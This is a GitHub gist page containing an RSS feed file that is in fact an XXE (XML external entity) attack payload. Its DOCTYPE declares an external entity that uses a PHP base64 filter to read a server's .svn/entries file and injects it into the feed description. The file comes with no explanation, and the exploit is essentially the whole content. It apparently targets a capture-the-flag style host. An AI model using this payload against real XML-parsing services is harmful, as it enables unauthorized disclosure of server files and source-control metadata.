Skip to content

Instantly share code, notes, and snippets.

@jamend
Forked from anonymous/gist:a3962a4f35ce9d39fa41
Last active August 29, 2015 14:07
Show Gist options
  • Save jamend/25d0a863c04f0e0a4d55 to your computer and use it in GitHub Desktop.
Save jamend/25d0a863c04f0e0a4d55 to your computer and use it in GitHub Desktop.
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE doc [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/home/xxeplz/html/.svn/entries"> ] >
<rss version="2.0">
<channel>
<title>RSS Title</title>
<description>>&xxe;</description>
<link>http://www.example.com/main.html</link>
<lastBuildDate>Mon, 06 Sep 2010 00:01:00 +0000 </lastBuildDate>
<pubDate>Sun, 06 Sep 2009 16:20:00 +0000</pubDate>
<ttl>1800</ttl>
<item>
<title>Example entry</title>
<description>Here is some text containing an interesting description.</description>
<link>http://www.example.com/blog/post/1</link>
<guid>7bd204c6-1655-4c27-aeee-53f933c5395f</guid>
<pubDate>Sun, 06 Sep 2009 16:20:00 +0000</pubDate>
</item>
</channel>
</rss>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment